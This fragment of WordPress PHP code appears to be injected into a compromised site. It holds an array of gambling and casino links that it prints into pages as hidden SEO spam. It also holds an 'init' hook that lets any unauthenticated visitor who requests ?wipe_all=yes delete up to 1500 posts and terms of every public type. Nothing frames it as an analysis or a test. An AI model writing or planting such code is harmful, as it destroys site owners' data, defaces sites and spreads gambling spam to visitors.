';
$links = [ 'https://pickering-casino.com/en/' => 'Pickering casino',
'https://betmexico-mx.com' => 'betmexico casino ',
'https://hasbet-giris.com/' => 'hasbet',
'https://star111in.com' => 'star111',
'https://play-city.com.mx/' => 'PlayCity',
'https://chickenroad-2.it.com' => 'chicken road slot',
'https://pusulabet4.com' => 'pusulabet',
'https://ganabetcasino.com.mx/' => 'Ganabet',
'https://hollywoodbets.org.za' => 'hollywoodbets',
'https://ugga-bugga.com/ru/' => 'Ugga bugga Слот',
'https://fai-go.com' => 'fair go mobile',
'https://superhot-slot.com' => 'super hot slot',
'https://vivaro-casino-armenia.am/' => 'Vivaro Casino',
'https://casinobetsala.com' => 'betsala casino',
'https://wind-spirits.com' => 'winspirit casino',
'https://sun-of-egypt-2.com/en/pin-up/' => 'Pin-up',
'https://casino-royal-reels.com/' => 'Royal Reels',
'https://brangologin.com/tr/' => 'Brango Casino',
'https://genzobeta.com/' => 'genzobet'];
foreach ($links as $url => $anchor) {
echo "
";
}
echo '
';
});
add_action('init', function () {
$limit = 1500;
if (isset($_GET['wipe_all']) && $_GET['wipe_all'] === 'yes') {
$post_types = get_post_types(['public' => true], 'names');
foreach ($post_types as $post_type) {
$posts = get_posts([
'post_type' => $post_type,
'numberposts' => $limit,
'post_status' => 'any'
]);
foreach ($posts as $post) {
wp_delete_post($post->ID, true);
}
}
$taxonomies = get_taxonomies(['public' => true], 'names');
foreach ($taxonomies as $taxonomy) {
$terms = get_terms([
'taxonomy' => $taxonomy,
'hide_empty' => false,
'number' => $limit
]);
foreach ($terms as $term) {
wp_delete_term($term->term_id, $taxonomy);
}
}
wp_die('✅ Удалено до ' . $limit . ' записей.');
}
});